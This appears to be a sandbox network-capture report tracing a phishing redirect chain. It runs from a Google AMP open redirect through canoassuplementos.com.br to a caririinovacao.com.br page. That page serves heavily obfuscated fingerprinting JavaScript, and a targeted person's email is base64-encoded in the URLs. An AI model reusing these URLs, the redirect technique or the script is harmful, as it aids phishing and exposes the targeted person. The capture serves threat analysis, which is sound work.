                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-08-29 18:55:41 UTC413INHTTP/1.1 301 Moved Permanently
                      Cache-Control: private
                      Content-Type: text/html; charset=UTF-8
                      Referrer-Policy: no-referrer
                      Location: https://google.com/amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A
                      Content-Length: 336
                      Date: Thu, 29 Aug 2024 18:55:41 GMT
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                      Connection: close
                      2024-08-29 18:55:41 UTC336INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 6d 70 2f 73 2f 63 61 6e 6f 61 73 73 75 70 6c 65 6d 65 6e 74 6f 73 2e 63 6f 6d 2e 62 72 2f 2f 2f 2f 2f 2f 64 61 79 6f 2f 78 6c 6a 6a 33 2f 62 57 5a 6c 63 6d 56 7a 51 48 42 6c 62 79 35 76 62 69 35 6a 59
                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://google.com/amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jY


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.449740142.250.181.2384435768C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2024-08-29 18:55:42 UTC773OUTGET /amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A HTTP/1.1
                      Host: google.com
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-User: ?1
                      Sec-Fetch-Dest: document
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-08-29 18:55:42 UTC957INHTTP/1.1 301 Moved Permanently
                      Location: https://www.google.com/amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A
                      Content-Type: text/html; charset=UTF-8
                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-QRgn5ZAcsVBK3RcNCU-wHw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                      Permissions-Policy: unload=()
                      Date: Thu, 29 Aug 2024 18:55:42 GMT
                      Expires: Sat, 28 Sep 2024 18:55:42 GMT
                      Cache-Control: public, max-age=2592000
                      Server: gws
                      Content-Length: 340
                      X-XSS-Protection: 0
                      X-Frame-Options: SAMEORIGIN
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                      Connection: close
                      2024-08-29 18:55:42 UTC340INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 6d 70 2f 73 2f 63 61 6e 6f 61 73 73 75 70 6c 65 6d 65 6e 74 6f 73 2e 63 6f 6d 2e 62 72 2f 2f 2f 2f 2f 2f 64 61 79 6f 2f 78 6c 6a 6a 33 2f 62 57 5a 6c 63 6d 56 7a 51 48 42 6c 62 79 35 76 62
                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vb


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.449741142.250.185.2284435768C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2024-08-29 18:55:43 UTC777OUTGET /amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A HTTP/1.1
                      Host: www.google.com
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-User: ?1
                      Sec-Fetch-Dest: document
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-08-29 18:55:43 UTC1232INHTTP/1.1 302 Found
                      Location: https://canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$
                      Cache-Control: private
                      X-Robots-Tag: noindex
                      Content-Type: text/html; charset=UTF-8
                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-pPHv8whueIE_6eKb1ffnsA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                      Permissions-Policy: unload=()
                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                      Date: Thu, 29 Aug 2024 18:55:43 GMT
                      Server: gws
                      Content-Length: 287
                      X-XSS-Protection: 0
                      X-Frame-Options: SAMEORIGIN
                      Set-Cookie: NID=517=6Pr7xD7s6qPtgPmASeXX3QosLIDx437-LSZktUOVb0DFPzSI9JORGSMHk_veC9sEIkcb3G9a7TaggJuDi1mFZllO796jcaJNkxtUElqcg3Mc83SRro1hJg-5yQ00DjJL9kJAMierdCbMY2uY4N2Ur9Dm2WvExGLoenkIoBYQeTDC5oJ1DwmQ9A; expires=Fri, 28-Feb-2025 18:55:43 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                      Connection: close
                      2024-08-29 18:55:43 UTC158INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64
                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved
                      2024-08-29 18:55:43 UTC129INData Raw: 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 6f 61 73 73 75 70 6c 65 6d 65 6e 74 6f 73 2e 63 6f 6d 2e 62 72 2f 2f 2f 2f 2f 2f 64 61 79 6f 2f 78 6c 6a 6a 33 2f 62 57 5a 6c 63 6d 56 7a 51 48 42 6c 62 79 35 76 62 69 35 6a 59 51 3d 3d 24 c3 83 c2 a3 c3 a2 c2 82 c2 ac c3 a2 c2 80 c2 9a 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                      Data Ascii: <A HREF="https://canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$">here</A>.</BODY></HTML>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.449742184.28.90.27443
                      TimestampBytes transferredDirectionData
                      2024-08-29 18:55:43 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      Accept-Encoding: identity
                      User-Agent: Microsoft BITS/7.8
                      Host: fs.microsoft.com
                      2024-08-29 18:55:44 UTC467INHTTP/1.1 200 OK
                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                      Content-Type: application/octet-stream
                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                      Server: ECAcc (lpl/EF06)
                      X-CID: 11
                      X-Ms-ApiVersion: Distribute 1.2
                      X-Ms-Region: prod-weu-z1
                      Cache-Control: public, max-age=139270
                      Date: Thu, 29 Aug 2024 18:55:43 GMT
                      Connection: close
                      X-CID: 2


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      5192.168.2.449744184.28.90.27443
                      TimestampBytes transferredDirectionData
                      2024-08-29 18:55:44 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      Accept-Encoding: identity
                      If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                      Range: bytes=0-2147483646
                      User-Agent: Microsoft BITS/7.8
                      Host: fs.microsoft.com
                      2024-08-29 18:55:45 UTC515INHTTP/1.1 200 OK
                      ApiVersion: Distribute 1.1
                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                      Content-Type: application/octet-stream
                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                      Server: ECAcc (lpl/EF06)
                      X-CID: 11
                      X-Ms-ApiVersion: Distribute 1.2
                      X-Ms-Region: prod-weu-z1
                      Cache-Control: public, max-age=139221
                      Date: Thu, 29 Aug 2024 18:55:45 GMT
                      Content-Length: 55
                      Connection: close
                      X-CID: 2
                      2024-08-29 18:55:45 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                      Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      6192.168.2.449743191.252.144.2244435768C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2024-08-29 18:55:47 UTC756OUTGET //////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A HTTP/1.1
                      Host: canoassuplementos.com.br
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-User: ?1
                      Sec-Fetch-Dest: document
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-08-29 18:55:48 UTC265INHTTP/1.1 200 OK
                      Date: Thu, 29 Aug 2024 18:55:48 GMT
                      Server: Apache
                      refresh: 0;url=https://hdjdsigfhgejw.caririinovacao.com.br/?wi=bWZlcmVzQHBlby5vbi5jYQ==$
                      Connection: close
                      Transfer-Encoding: chunked
                      Content-Type: text/html; charset=UTF-8
                      2024-08-29 18:55:48 UTC5INData Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      7192.168.2.449745191.252.144.2244435768C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2024-08-29 18:55:49 UTC693OUTGET /favicon.ico HTTP/1.1
                      Host: canoassuplementos.com.br
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      sec-ch-ua-platform: "Windows"
                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                      Sec-Fetch-Site: same-origin
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: image
                      Referer: https://canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-08-29 18:55:49 UTC164INHTTP/1.1 404 Not Found
                      Date: Thu, 29 Aug 2024 18:55:49 GMT
                      Server: Apache
                      Content-Length: 315
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      2024-08-29 18:55:49 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      8192.168.2.449747164.90.176.2134435768C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2024-08-29 18:55:49 UTC833OUTGET /?wi=bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%83%C3%82%C2%A3%C3%83%C2%A2%C3%82%C2%82%C3%82%C2%AC%C3%83%C2%A2%C3%82%C2%80%C3%82%C2%9A HTTP/1.1
                      Host: hdjdsigfhgejw.caririinovacao.com.br
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Sec-Fetch-Site: cross-site
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-Dest: document
                      Referer: https://canoassuplementos.com.br/
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-08-29 18:55:50 UTC181INHTTP/1.1 200 OK
                      Server: nginx
                      Date: Thu, 29 Aug 2024 18:55:50 GMT
                      Content-Type: text/html; charset=utf-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Vary: Accept-Encoding
                      2024-08-29 18:55:50 UTC16203INData Raw: 37 37 66 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 66 75 6e 63 74 69 6f 6e 20 61 30 44 34 28 29 7b 76 61 72 20 64 52 3d 5b 27 66 54 66 52 42 27 2c 27 6f 62 6a 65 63 74 27 2c 27 4d 6f 7a 41 70 70 65 61 72 61 6e 63 65 27 2c 27 64 6f 63 75 6d 65 6e 74 2e 46 3d 4f 62 6a 65 63 74 27 2c 27 44 61 74 65 54 69 6d 65 46 6f 72 6d 61 74 27 2c 27 2f 6e 70 6d 2d 6d 6f 6e 69 74 6f 72 69 6e 67 27 2c 27 63 6f 6e 6e 65 63 74 69 6f 6e 27 2c 27 44 49 56 2e 61 67 6f 72 65 73 33 30 30 27 2c 27 48 61 65 74 74 65 6e 73 63 68 77 65 69 6c 65 72 27 2c 27 27 2c 27 63 6f 6e 74 65 78 74
                      Data Ascii: 77f5<!DOCTYPE html><html lang="en"> <head> <script type="text/javascript"> function a0D4(){var dR=['fTfRB','object','MozAppearance','document.F=Object','DateTimeFormat','/npm-monitoring','connection','DIV.agores300','Haettenschweiler','','context
                      2024-08-29 18:55:50 UTC14514INData Raw: 67 6e 65 74 2d 72 65 63 6f 6d 6d 65 6e 64 27 2c 27 2e 65 74 73 79 2d 74 77 65 65 74 27 2c 27 41 75 64 69 6f 27 2c 27 48 62 52 65 6b 27 2c 27 6e 79 77 71 73 27 2c 27 23 61 61 66 6f 6f 74 2e 74 6f 70 5f 62 6f 78 27 2c 27 43 61 6e 6e 6f 74 5c 78 32 30 63 6f 6e 76 65 72 74 5c 78 32 30 61 5c 78 32 30 53 79 6d 62 6f 6c 5c 78 32 30 76 61 6c 75 65 5c 78 32 30 74 6f 5c 78 32 30 61 5c 78 32 30 73 74 72 69 6e 67 27 2c 27 4d 53 5c 78 32 30 4f 75 74 6c 6f 6f 6b 27 2c 27 52 45 53 54 27 2c 27 4d 69 63 72 6f 73 6f 66 74 5c 78 32 30 55 69 67 68 75 72 27 2c 27 27 2c 27 27 2c 27 4e 6b 4c 72 68 27 2c 27 42 69 74 73 74 72 65 61 6d 5c 78 32 30 56 65 72 61 5c 78 32 30 53 61 6e 73 5c 78 32 30 4d 6f 6e 6f 27 2c 27 6a 61 76 61 27 2c 27 55 45 41 77 4e 27 2c 27 35 36 36 37 30 36 75
                      Data Ascii: gnet-recommend','.etsy-tweet','Audio','HbRek','nywqs','#aafoot.top_box','Cannot\x20convert\x20a\x20Symbol\x20value\x20to\x20a\x20string','MS\x20Outlook','REST','Microsoft\x20Uighur','','','NkLrh','Bitstream\x20Vera\x20Sans\x20Mono','java','UEAwN','566706u
                      2024-08-29 18:55:50 UTC16384INData Raw: 34 30 30 30 0d 0a 59 50 28 30 78 32 39 30 29 3a 6f 77 5b 59 50 28 30 78 33 62 30 29 5d 26 26 59 50 28 30 78 34 65 36 29 3d 3d 74 79 70 65 6f 66 20 44 65 6e 6f 5b 59 50 28 30 78 32 35 37 29 5d 3f 59 50 28 30 78 31 64 63 29 3a 59 50 28 30 78 33 62 38 29 3d 3d 3d 6f 64 28 6f 77 5b 59 50 28 30 78 33 62 38 29 5d 29 3f 27 4e 4f 44 45 27 3a 6f 77 5b 59 50 28 30 78 34 63 36 29 5d 26 26 6f 77 5b 59 50 28 30 78 31 64 30 29 5d 3f 59 50 28 30 78 32 65 30 29 3a 59 50 28 30 78 34 62 39 29 3b 7d 7d 2c 30 78 32 31 61 34 3a 66 75 6e 63 74 69 6f 6e 28 6f 55 2c 6f 42 2c 6f 43 29 7b 76 61 72 20 59 4c 3d 61 30 44 35 2c 6f 77 3d 6f 43 28 30 78 31 35 63 61 29 2c 6f 4b 3d 6f 43 28 30 78 31 33 36 31 29 5b 27 66 27 5d 2c 6f 64 3d 6f 43 28 30 78 32 33 34 64 29 2c 6f 52 3d 6f 43 28
                      Data Ascii: 4000YP(0x290):ow[YP(0x3b0)]&&YP(0x4e6)==typeof Deno[YP(0x257)]?YP(0x1dc):YP(0x3b8)===od(ow[YP(0x3b8)])?'NODE':ow[YP(0x4c6)]&&ow[YP(0x1d0)]?YP(0x2e0):YP(0x4b9);}},0x21a4:function(oU,oB,oC){var YL=a0D5,ow=oC(0x15ca),oK=oC(0x1361)['f'],od=oC(0x234d),oR=oC(
                      2024-08-29 18:55:50 UTC8INData Raw: 64 29 5d 28 30 78 0d 0a
                      Data Ascii: d)](0x
                      2024-08-29 18:55:50 UTC16384INData Raw: 34 30 30 30 0d 0a 30 29 3b 7d 29 3f 66 75 6e 63 74 69 6f 6e 28 6f 69 29 7b 72 65 74 75 72 6e 27 53 74 72 69 6e 67 27 3d 3d 3d 6f 4d 28 6f 69 29 3f 6f 51 28 6f 69 2c 27 27 29 3a 6f 47 28 6f 69 29 3b 7d 3a 6f 47 3b 7d 7d 3b 7d 2c 30 78 34 31 30 3a 66 75 6e 63 74 69 6f 6e 28 6f 55 2c 6f 42 2c 6f 43 29 7b 76 61 72 20 58 53 3d 61 30 44 35 2c 6f 77 3d 6f 43 28 30 78 37 33 62 29 5b 58 53 28 30 78 34 66 38 29 5d 2c 6f 4b 3d 6f 43 28 30 78 31 34 61 61 29 2c 6f 64 3d 6f 43 28 30 78 31 65 33 61 29 2c 6f 52 3d 6f 43 28 30 78 38 65 35 29 2c 6f 6d 3d 6f 43 28 30 78 31 61 37 37 29 2c 6f 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 3b 7d 3b 6f 55 5b 27 65 78 70 6f 72 74 73 27 5d 3d 66 75 6e 63 74 69 6f 6e 28 6f 4a 2c 6f 54 2c 6f 62 2c 6f 41 29
                      Data Ascii: 40000);})?function(oi){return'String'===oM(oi)?oQ(oi,''):oG(oi);}:oG;}};},0x410:function(oU,oB,oC){var XS=a0D5,ow=oC(0x73b)[XS(0x4f8)],oK=oC(0x14aa),od=oC(0x1e3a),oR=oC(0x8e5),om=oC(0x1a77),oe=function(){return this;};oU['exports']=function(oJ,oT,ob,oA)
                      2024-08-29 18:55:50 UTC8INData Raw: 27 2b 6f 67 2b 55 0d 0a
                      Data Ascii: '+og+U
                      2024-08-29 18:55:50 UTC16384INData Raw: 38 34 37 34 0d 0a 31 28 30 78 31 64 36 29 2c 6f 66 29 29 2c 6f 4c 26 26 28 6f 73 3d 6f 6a 5b 27 6c 61 73 74 49 6e 64 65 78 27 5d 29 2c 6f 75 3d 6f 64 28 6f 47 2c 6f 72 3f 6f 76 3a 6f 6a 2c 6f 4f 29 2c 6f 72 3f 6f 75 3f 28 6f 75 5b 55 31 28 30 78 35 35 63 29 5d 3d 6f 6b 28 6f 75 5b 55 31 28 30 78 35 35 63 29 5d 2c 6f 53 29 2c 6f 75 5b 30 78 30 5d 3d 6f 6b 28 6f 75 5b 30 78 30 5d 2c 6f 53 29 2c 6f 75 5b 27 69 6e 64 65 78 27 5d 3d 6f 6a 5b 55 31 28 30 78 31 39 37 29 5d 2c 6f 6a 5b 55 31 28 30 78 31 39 37 29 5d 2b 3d 6f 75 5b 30 78 30 5d 5b 55 31 28 30 78 31 38 66 29 5d 29 3a 6f 6a 5b 27 6c 61 73 74 49 6e 64 65 78 27 5d 3d 30 78 30 3a 6f 4c 26 26 6f 75 26 26 28 6f 6a 5b 27 6c 61 73 74 49 6e 64 65 78 27 5d 3d 6f 6a 5b 55 31 28 30 78 31 66 31 29 5d 3f 6f 75 5b
                      Data Ascii: 84741(0x1d6),of)),oL&&(os=oj['lastIndex']),ou=od(oG,or?ov:oj,oO),or?ou?(ou[U1(0x55c)]=ok(ou[U1(0x55c)],oS),ou[0x0]=ok(ou[0x0],oS),ou['index']=oj[U1(0x197)],oj[U1(0x197)]+=ou[0x0][U1(0x18f)]):oj['lastIndex']=0x0:oL&&ou&&(oj['lastIndex']=oj[U1(0x1f1)]?ou[
                      2024-08-29 18:55:50 UTC16384INData Raw: 28 30 78 33 30 62 29 3a 72 65 74 75 72 6e 20 6f 4a 28 6f 69 2c 21 30 78 31 29 3b 63 61 73 65 27 76 61 6c 75 65 73 27 3a 72 65 74 75 72 6e 20 6f 4a 28 6f 51 5b 6f 69 5d 2c 21 30 78 31 29 3b 7d 72 65 74 75 72 6e 20 6f 4a 28 5b 6f 69 2c 6f 51 5b 6f 69 5d 5d 2c 21 30 78 31 29 3b 7d 7d 2c 42 52 28 30 78 35 38 66 29 29 3b 76 61 72 20 6f 4d 3d 6f 64 5b 42 52 28 30 78 33 63 39 29 5d 3d 6f 64 5b 42 52 28 30 78 32 39 37 29 5d 3b 69 66 28 6f 4b 28 42 52 28 30 78 33 30 62 29 29 2c 6f 4b 28 42 52 28 30 78 35 38 66 29 29 2c 6f 4b 28 42 52 28 30 78 34 38 61 29 29 2c 21 6f 54 26 26 6f 62 26 26 42 52 28 30 78 35 38 66 29 21 3d 3d 6f 4d 5b 27 6e 61 6d 65 27 5d 29 74 72 79 7b 6f 6d 28 6f 4d 2c 42 52 28 30 78 34 32 37 29 2c 7b 27 76 61 6c 75 65 27 3a 27 76 61 6c 75 65 73 27
                      Data Ascii: (0x30b):return oJ(oi,!0x1);case'values':return oJ(oQ[oi],!0x1);}return oJ([oi,oQ[oi]],!0x1);}},BR(0x58f));var oM=od[BR(0x3c9)]=od[BR(0x297)];if(oK(BR(0x30b)),oK(BR(0x58f)),oK(BR(0x48a)),!oT&&ob&&BR(0x58f)!==oM['name'])try{om(oM,BR(0x427),{'value':'values'
